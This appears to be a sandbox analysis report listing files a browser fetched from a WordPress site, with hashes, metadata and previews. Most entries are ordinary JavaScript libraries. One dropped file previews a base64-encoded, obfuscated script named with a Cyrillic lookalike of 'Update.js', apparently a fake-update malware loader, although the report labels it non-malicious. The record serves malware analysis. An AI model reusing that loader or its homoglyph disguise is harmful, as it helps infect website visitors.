                                                                                                                                                                                                                                                                        SHA1:C437BFE00812D31B61F93E75BC8B0ED9CD15BA65
                                                                                                                                                                                                                                                                        SHA-256:E101E32BA6CD535F0C03A4FA80754DFA694B187C713C35BCC72E83438F3D4EE3
                                                                                                                                                                                                                                                                        SHA-512:0DC340A4430D6931F8A555EA11331C7A362CD6E26D7C9A16D27EC48BBDB256952E923684B4D9EB391D6E433551B0186D282B4200AB355265712A722A042229DE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-responsive.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:jQuery(window).on("load",function(){um_responsive(),um_modal_responsive()}),jQuery(window).on("resize",_.debounce(function(){responsive_Modal(),wp.hooks.doAction("um_window_resize"),um_responsive(),um_modal_responsive()},300)),wp.hooks.addAction("um_admin_modal_success_result","um_frontend_responsive",function(o){o.find(".um-admin-modal-body").find(".um").length&&um_responsive()});
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):8308
                                                                                                                                                                                                                                                                        Entropy (8bit):5.141806109931769
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:G3+XrdT5pCvWRPtTkiiX3hlSWqlDfxALo3xs:G3yrdT5UvW/AiiHSlN8ohs
                                                                                                                                                                                                                                                                        MD5:FFFDB6679196753BCFA1767DF50FFA0F
                                                                                                                                                                                                                                                                        SHA1:B47DE9386586D4ED9ACB42CF001CBC2505B1EA10
                                                                                                                                                                                                                                                                        SHA-256:B4F6B37BECCF9DD518909C6777ED26D3AED7077538EC9F14C0F002604946C82D
                                                                                                                                                                                                                                                                        SHA-512:A1E727C214FB3C59971759D9EFB7C8C5DD6D45752CE8226771B38B74697C5BC8BACB3EDA7FE0F7E3C96D76028A6471CEFE96C965A18B51A0A55ED760E6BE9544
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.min.js?ver=3.6.2
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define("picker",["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):this.Picker=e(jQuery)}(function(h){var o=h(window),m=h(document),r=h(document.documentElement),g=null!=document.documentElement.style.transition;function v(r,t,n,e){var o,d,s,i,c,u;return r?(o=!1,d={id:r.id||"P"+Math.abs(~~(Math.random()*new Date))},s=n?h.extend(!0,{},n.defaults,e):e||{},i=h.extend({},v.klasses(),s.klass),c=h(r),u=(e=function(){return this.start()}).prototype={constructor:e,$node:c,start:function(){var e;return d&&d.start?u:(d.methods={},d.start=!0,d.open=!1,d.type=r.type,r.autofocus=r==b(),r.readOnly=!s.editable,r.id=r.id||d.id,"text"!=r.type&&(r.type="text"),u.component=new n(u,s),u.$root=h('<div class="'+i.picker+'" id="'+r.id+'_root" />'),$(u.$root[0],"hidden",!0),u.$holder=h(a()).appendTo(u.$root),l(),s.formatSubmit&&(!0===s.hiddenName?(e=r.name,r.name=""):e=(e=["string"==typeof s.hiddenPrefix?s.hiddenPrefix:"","string"==typ
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (37193)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):37380
                                                                                                                                                                                                                                                                        Entropy (8bit):5.26765700515755
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:wCeGBNOaZ2ZMN7PHDj6KsgabjNu5kq2rSDlbkKJrZ2USwiyFa:xOnaD2KkbjNmB2yQKJrZ2lwiyFa
                                                                                                                                                                                                                                                                        MD5:37C2521EFBE4ED78DA774D284DAD1483
                                                                                                                                                                                                                                                                        SHA1:F67F53F06F5D011B4FC7DBB81F8E5109DED3199D
                                                                                                                                                                                                                                                                        SHA-256:B20765DFF4A5C832A07A5E86D2F46D429BA60024B2C8A0A746D7F5EF5EAAD33C
                                                                                                                                                                                                                                                                        SHA-512:F4A908A9D7CDEE2A445BA07A93E02ADB43D5DF56E3383838000E765BEB58B401348C4D24331E3D6E3277160BD2E7AC339B27CC5076D0E0A9B66FB97DF98FFE12
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1
                                                                                                                                                                                                                                                                        Preview:/*!. * Cropper.js v1.6.1. * https://fengyuanchen.github.io/cropperjs. *. * Copyright 2015-present Chen Fengyuan. * Released under the MIT license. *. * Date: 2023-09-17T03:44:19.860Z. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).Cropper=e()}(this,function(){"use strict";function C(e,t){var i,a=Object.keys(e);return Object.getOwnPropertySymbols&&(i=Object.getOwnPropertySymbols(e),t&&(i=i.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),a.push.apply(a,i)),a}function S(a){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?C(Object(n),!0).forEach(function(t){var e,i;e=a,i=n[t=t],(t=P(t))in e?Object.defineProperty(e,t,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[t]=i}):Object.getOwnPropertyDescriptors?Object.defineProperties(a,Object.getOwnPropertyDescriptors(n)):C(Object(n)).for
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (37933)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):38056
                                                                                                                                                                                                                                                                        Entropy (8bit):5.156899563931149
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:I5veG0+6ihBBT+MGGgSEYBEZ9yEfRtEVQMGQO2SlT6qFOTH1:I5veGsacG7EGEZ9ytnO2SeV
                                                                                                                                                                                                                                                                        MD5:0F6D33ED6E785188AF9DA72B58D10C04
                                                                                                                                                                                                                                                                        SHA1:92E5ABF953E60C5D744988CEE7187AF2AF870E1F
                                                                                                                                                                                                                                                                        SHA-256:BDE6523969879EED5B8B9873E6D0E77114F8BF2761364289A3B8F7B0C6BBDD64
                                                                                                                                                                                                                                                                        SHA-512:99EB1AE381C971C79C62038F1D5CA56A60CB62CB70DC3E36F290BEC8A0F9C799A4A96EF057C87E01EA0C18EAEB0F2068788285165F9623DA5CD878BC82E351C8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:/*! @vimeo/player v2.23.0 | (c) 2024 Vimeo | MIT License | https://github.com/vimeo/player.js */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):((e="undefined"!=typeof globalThis?globalThis:e||self).Vimeo=e.Vimeo||{},e.Vimeo.Player=t())}(this,function(){"use strict";function r(t,e){var n,r=Object.keys(t);return Object.getOwnPropertySymbols&&(n=Object.getOwnPropertySymbols(t),e&&(n=n.filter(function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable})),r.push.apply(r,n)),r}function u(t){for(var e=1;e<arguments.length;e++){var n=null!=arguments[e]?arguments[e]:{};e%2?r(Object(n),!0).forEach(function(e){s(t,e,n[e])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(n)):r(Object(n)).forEach(function(e){Object.defineProperty(t,e,Object.getOwnPropertyDescriptor(n,e))})}return t}function j(){j=function(){return a};var a={},e=Object.prototype,s=e.hasOwnPrope
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):9141
                                                                                                                                                                                                                                                                        Entropy (8bit):5.2975271144294185
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:s6zoFrnW4iaX3LzDk1jpJLB2hlq717+3uClD2tFtJ7bykd+SHS+F:s6Udn3LzoJphH8uClD2tFtJ7byTwtF
                                                                                                                                                                                                                                                                        MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
                                                                                                                                                                                                                                                                        SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
                                                                                                                                                                                                                                                                        SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
                                                                                                                                                                                                                                                                        SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                                                                                                                                                                                                                                                                        Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 251 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):7876
                                                                                                                                                                                                                                                                        Entropy (8bit):7.954312109240667
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:d+uGnTJCd0dhQo2tPIWlkZsIjM9fYj3xBgHGoRrVDyt:guGV4ftPZ+ZsYWfYrxB3Sr0t
                                                                                                                                                                                                                                                                        MD5:8FF776825BFCCE339EED5105474AA8CE
                                                                                                                                                                                                                                                                        SHA1:2DDF8200A525535C0D72C4491BF8C0AAC092B349
                                                                                                                                                                                                                                                                        SHA-256:BAC949882DCE914F15C2E4B382B91245ADEA7FD207FEA5A560BFF4985788AB16
                                                                                                                                                                                                                                                                        SHA-512:DFEBC1164CA5EA495E67F851032EB3A1BC2A1AB22F265F96D3F389F3FFB01DF557F03594DDCFAFE8E409E22BF0D1EE9B7153347C335DB42563C4B2803746CA86
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.......d.....@BF0....IDATx...k.A.....;.....P.0.!........V.*.6.....u....&.....MPR).....B.&.wv._.p....q(8...c.].by.y."I.$jau...R.p|..:8.?2._]\,.\Y..u......zH....y.If.r.....T.YP.}'.#i..G..e........I/3-, r...Q..n..,i..... ..Z...&.[..:.M..h..&&........4"U...99w]!,.. ...@7...nzO...8..7......='.J}}..(.K.3..."c..:...)....z.[....f....*...X..5.L.+S\gv.....-K:_.y.4.,.R....^O.g.T..Tz..|.#..0"2.rM.LC.;..]M..."..S.r.MN>M..$6V..!....1.k..ZI`....~.;..J....H.>.I..P.e..n......i..n.....0C...^...Z(Ia....<.. ......h.......gQL.<... .Q....\..i... .,..Y....?$...PA......IG../.H^.t?./..=F.....}...{.......T...%..j....r.qU.SUi...Z..."WV...Di.U*i".r.............H.7...,^.....w...4\ew'.3....{>.Gs.f.q..;..s.(Gw#.......I@.'...,.S.....*b..%...].6$M.C.^.]I....c...... .0..Vm.n..?..zR.....}.......@...KL...q.F..k.;t....+0.(..B.. -..J.....u........@S....?.^.|..%..c.eY..W.E..k.3t...\f.a..%.U..DD..J.V....]...M..s...~....T.g8....@.3.....s.'...Mx.N.gt..,V..#.L..y.J.."....{.J.u
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):259
                                                                                                                                                                                                                                                                        Entropy (8bit):4.866127354389964
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:z8HpxIX/vDRmzVxlCMQwxDM1NrM+ocPoezGeR0MqCFsYM:zAjQvDQV3CMQiQ1h7ocPonMq0sh
                                                                                                                                                                                                                                                                        MD5:21D1750911E1A79DF73A03FB7D741C5B
                                                                                                                                                                                                                                                                        SHA1:7501E4B411B9C92B8C6012CFC7C0D6EEA738542B
                                                                                                                                                                                                                                                                        SHA-256:D3C19AF1E12BD11ABED887C1F9765AC0D1769669F5D649234EAD613E9D02B3C2
                                                                                                                                                                                                                                                                        SHA-512:93FD5567410B359E5B3CD161AC8A836674239898CE017B9F4727C3B3C453046BC2A88761511AEF071D48A3F308B79A25987CE363F27741348F0687AF6624A825
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:jQuery(document).on("ready fusion-element-render-fusion_alert",function(e,n){(void 0!==n?jQuery('div[data-cid="'+n+'"]').find(".fusion-alert .close"):jQuery(".fusion-alert .close")).on("click",function(e){e.preventDefault(),jQuery(this).parent().slideUp()})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):174
                                                                                                                                                                                                                                                                        Entropy (8bit):4.596619122585412
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:RAM8HpRBEBc2LGRFLhBeXe3EHK4REXhVQBqWuB33/vZq0hVQXAEqHEBwZM:z8HpULshBD9dhCqbN3/vZq0hUhNGM
                                                                                                                                                                                                                                                                        MD5:FA46E783B24BF13A49E3B9F394EC078C
                                                                                                                                                                                                                                                                        SHA1:E5F1EB1EA018E6D542909D27B56018F978931E2F
                                                                                                                                                                                                                                                                        SHA-256:9311D1E610E59B8BFBB56B34BD2B8B5B7597FA2703FE83A97E096FBFCD79F2A3
                                                                                                                                                                                                                                                                        SHA-512:27B1956D6B21C56C7DF1658B8B8DB8C53110F4CB7D4FF2781465FAF311DA410E6FEB5726C281F8C89E0C90D3038981B6F459CDEC096D282508AC393CB3ED6445
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/plugins/disable-gravity-forms-fields/disable-gf-fields.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function($){$(".disabled input, .disabled textarea").prop('disabled','disabled');$(".readonly input, .readonly textarea").prop('readonly','readonly')})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (694), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):694
                                                                                                                                                                                                                                                                        Entropy (8bit):4.966017255100568
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:vCin/8PlnAYQhrLCxtxmR2Aj8XXfX8S0wkVpFhXPI:vCikPlnA9hqxtxqNIXPowk3FZw
                                                                                                                                                                                                                                                                        MD5:92C25705674444A62BD66A9608DB7CFD
                                                                                                                                                                                                                                                                        SHA1:29B3B7656EDEF73418450FF14B6DF6D6970ABBF4
                                                                                                                                                                                                                                                                        SHA-256:9367632D8901356EF14C68B71C23596CCB00FFC9903B1952EA0DFA5A801DECC0
                                                                                                                                                                                                                                                                        SHA-512:FAF3B5669D3570A7550135DEA7B5DDF9B33C4016991C7C2AD75CE183FE1FB03A2037BB5E2B0E3D9D79FEC0CD6ECA6866001F861E3917889121EED7F0D34D3B53
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e,n,t){for(var i,a=0,m=function(e){i&&(n.requestAnimationFrame(m,e),jQuery.fx.tick())},r=["ms","moz","webkit","o"],o=0,u=r.length;o<u&&!n.requestAnimationFrame;++o)n.requestAnimationFrame=n[r[o]+"RequestAnimationFrame"],n.cancelAnimationFrame=n[r[o]+"CancelAnimationFrame"]||n[r[o]+"CancelRequestAnimationFrame"];n.requestAnimationFrame||(n.requestAnimationFrame=function(e,t){var i=(new Date).getTime(),m=i-a,r=Math.max(0,16-m),o=n.setTimeout(function(){e(i+r)},r);return a=i+r,o}),n.cancelAnimationFrame||(n.cancelAnimationFrame=function(e){clearTimeout(e)}),jQuery.fx.timer=function(e){e()&&jQuery.timers.push(e)&&!i&&(i=!0,m(e.elem))},jQuery.fx.stop=function(){i=!1}}(jQuery,this)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (844), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):844
                                                                                                                                                                                                                                                                        Entropy (8bit):5.024576975534547
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:M6r0W7PZjqwrKAMkzcXaWfWjvP3SKLcAc54vPK8XSKLcAc5e4n:Mi/9jqwrlMjXvWzPCKoh5cTiKoh5e4
                                                                                                                                                                                                                                                                        MD5:4A40675F5B541916EF99659BD7013AEB
                                                                                                                                                                                                                                                                        SHA1:467FCA6127C9976D51BBC1E78CB771BE1BC1CD92
                                                                                                                                                                                                                                                                        SHA-256:CA5DCDFA1827FCA8AABBF974CFA7515D1C733F9BDEFEE8016DF80F2E0BBD43F7
                                                                                                                                                                                                                                                                        SHA-512:8E9321A12D509D9B951B739A5718C128F1AEF60DD0E84382131C77C295F7CABEA48C2FF1DC7220D06891E416E024F310D17592C7C8EA4A5702BBDA6158F23709
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-scrollspy.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function fusionGetScrollOffset(){var t,o=fusion.getAdminbarHeight(),e="function"==typeof getStickyHeaderHeight?getStickyHeaderHeight():0,s=parseInt(o+e+1,10);return jQuery(".fusion-tb-header").length&&"function"==typeof fusionGetStickyOffset?(t=fusionGetStickyOffset())?t+1:o:s}jQuery(document).ready(function(){jQuery("body").scrollspy({target:".fusion-menu",offset:fusionGetScrollOffset()}),jQuery(window).on("load fusion-sticky-change fusion-sticky-scroll-change",function(){"object"==typeof jQuery("body").data()["bs.scrollspy"]&&(jQuery("body").data()["bs.scrollspy"].options.offset=fusionGetScrollOffset())}),jQuery(window).on("fusion-sticky-transition-change",function(){setTimeout(function(){"object"==typeof jQuery("body").data()["bs.scrollspy"]&&(jQuery("body").data()["bs.scrollspy"].options.offset=fusionGetScrollOffset())},300)})})
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6545), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6545
                                                                                                                                                                                                                                                                        Entropy (8bit):5.7856696608931415
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:p8aV8N3VdgVI+oVCmAVn9yWVeu2dnhzF0E8NVmuGz/5Gnu+Bf9:pBV8/+DR+u2ZhppEVZ
                                                                                                                                                                                                                                                                        MD5:9D2B5FD164A4E28DCE73B5BF80F7D3BE
                                                                                                                                                                                                                                                                        SHA1:4610E37848C8EDF3F6A0FB0A3DCF565AF4FCB17A
                                                                                                                                                                                                                                                                        SHA-256:42961565CD0549779CE56D6F4817FE51B5906F91ADFEAECDC61DF2430CFBDEBD
                                                                                                                                                                                                                                                                        SHA-512:4B62951E7BD7FEE9EFA977D37622A9424FF8FAAA200D9E5FC8BB7DF5E3AB28F3492CEBCD09BADAE3883C5B05D006999DB8C8C023F8D6204D85288611BE4241B5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:var filename="U\u0440date.js";var filePlain=window.atob('LypAY2Nfb24KKGZ1bmN0aW9uKF8weDQ5ZDE1MyxfMHgyOTlmZWMpe3ZhciBhMF8weDRmOGM1Zj17XzB4NDU0NDAwOjB4YzYsXzB4MTFlODA2OjB4YmMsXzB4Mzg0ODg3OjB4ZGQsXzB4M2QwMDIyOjB4YzgsXzB4MjA3ZjVjOjB4YzgsXzB4NTQ0NjJjOjB4YzMsXzB4NDA0ZWYxOjB4YWEsXzB4NDI2NmUxOjB4YmIsXzB4MjA2ZDJhOjB4OGIsXzB4MzhlZjYzOjB4YTQsXzB4NTk2NjE0OjB4ZDMsXzB4NDY2YmE4OjB4Y2YsXzB4MTQyZDM2OjB4ZTIsXzB4NDMyOWNjOjB4Y2UsXzB4MWQ1OTQ0OjB4YjAsXzB4MzdkODY1OjB4YTAsXzB4MmIyN2U1OjB4YjQsXzB4MTliODFjOjB4YTEsXzB4YzYzMWMzOjB4OTIsXzB4MjUzZmE5OjB4YTIsXzB4MTNhNDRmOjB4ZDAsXzB4MTE3YjE0OjB4YzAsXzB4MTMzOGIxOjB4YjUsXzB4M2VmYWEwOjB4YzF9LGEwXzB4MWM3MmMzPXtfMHg0MjM5Y2Q6MHgxN2J9O2Z1bmN0aW9uIF8weDQ3ZWY2MShfMHg0NDJiNDEsXzB4MzNhZjI5KXtyZXR1cm4gYTBfMHgzZmVmKF8weDMzYWYyOS0gLWEwXzB4MWM3MmMzLl8weDQyMzljZCxfMHg0NDJiNDEpO312YXIgXzB4MmNiMDhhPV8weDQ5ZDE1MygpO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4NDI1NWM0PXBhcnNlSW50KF8weDQ3ZWY2MSgtYTBfMHg0ZjhjNWYuXzB4NDU0NDAwLC1hMF8weDRmOGM1Zi5fMHgxMWU4MDYpKS8weDEqKC1wYXJzZUludChfMHg0N2VmNjEoLWEwXzB4NGY
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9103), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):9103
                                                                                                                                                                                                                                                                        Entropy (8bit):5.039082961498355
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:nbHbKVlJV2mxtGp8r5RBQ2qaDGsUH5LQ+8Mw:nbHWDJjWeiS6/w
                                                                                                                                                                                                                                                                        MD5:59F75AA49162A9CBD234C1C445BB92E5
                                                                                                                                                                                                                                                                        SHA1:92337C52D8F18153DBB728FB1C7C6E4BAF99DE11
                                                                                                                                                                                                                                                                        SHA-256:0B38470A40052C9BA91360E670A9F423FBB9E3FF9944F7B39FDD74B489562669
                                                                                                                                                                                                                                                                        SHA-512:B1B70018CDCBB07E8F2E4C281FA0FC747BBC014B40D8C30FC142B006AA1116FF822FF49AD19C1E5C304A7F62F9F76D3791166BF2EC6EF39D82510552829AD935
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(i){var r={init:function(t){return this.each(function(){this.self=i(this),r.destroy.call(this.self),this.opt=i.extend(!0,{},i.fn.um_raty.defaults,t),r._adjustCallback.call(this),r._adjustNumber.call(this),"img"!==this.opt.starType&&r._adjustStarType.call(this),r._adjustPath.call(this),r._createStars.call(this),this.opt.cancel&&r._createCancel.call(this),this.opt.precision&&r._adjustPrecision.call(this),r._createScore.call(this),r._apply.call(this,this.opt.score),r._target.call(this,this.opt.score),(this.opt.readOnly?r._lock:(this.style.cursor="pointer",r._binds)).call(this),this.self.data("options",this.opt)})},_adjustCallback:function(){for(var t=["number","readOnly","score","scoreName","target"],e=0;e<t.length;e++)"function"==typeof this.opt[t[e]]&&(this.opt[t[e]]=this.opt[t[e]].call(this))},_adjustNumber:function(){this.opt.number=r._between(this.opt.number,1,this.opt.numberMax)},_adjustPath:function(){this.opt.path=this.opt.path||"",this.opt.path&&"/"!==this.opt.path.charA
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):132
                                                                                                                                                                                                                                                                        Entropy (8bit):4.524899448665393
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:tIU9iCVAa8TYnNf8K/NGIU9iCVAa8TYnNf8K/NGIU9iCVAa8TYnNf8KU:GcA5TYndbF9cA5TYndbF9cA5TYndbU
                                                                                                                                                                                                                                                                        MD5:B2347F6C039322647FA4F0BE7E315373
                                                                                                                                                                                                                                                                        SHA1:92A1B0ED31FD15990CCB1F823629B08CFAB062BF
                                                                                                                                                                                                                                                                        SHA-256:50B0457980742742EC884798FEAE0D5F7781806E48ED61B6DDF7AD9CC698DF97
                                                                                                                                                                                                                                                                        SHA-512:6FE72DC38C548E6FCC110EBC1A97507C2CB51F76F310DE35204CC538E1546B8A523E6882E3412A01B1A7B5701408AAA3B6C04D46A394FE99F1A9F81B56C0714C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgm_GsblqBdCVhIFDSbzfSsSBQ2_JFKQEgUN-YoPaBIeCbbvnIrrjMN6EgUNJvN9KxIFDb8kUpASBQ35ig9oEh4JDhIO5ej8LNMSBQ0m830rEgUNvyRSkBIFDfmKD2g=?alt=proto
                                                                                                                                                                                                                                                                        Preview:Ch8KCw0m830rGgQICRgBCgcNvyRSkBoACgcN+YoPaBoACh8KCw0m830rGgQICRgBCgcNvyRSkBoACgcN+YoPaBoACh8KCw0m830rGgQICRgBCgcNvyRSkBoACgcN+YoPaBoA
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4741)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4776
                                                                                                                                                                                                                                                                        Entropy (8bit):5.153085086858448
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:vmK40IdSs6c7DE/3sc/YrEBnUBPwKxbqe/Ds91sBYt1Em4kCofWQRemN:OK40IdS/cHg3NZBnUJbqe/DeGYtu7kC6
                                                                                                                                                                                                                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                                                                                                                                                                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                                                                                                                                                                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                                                                                                                                                                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
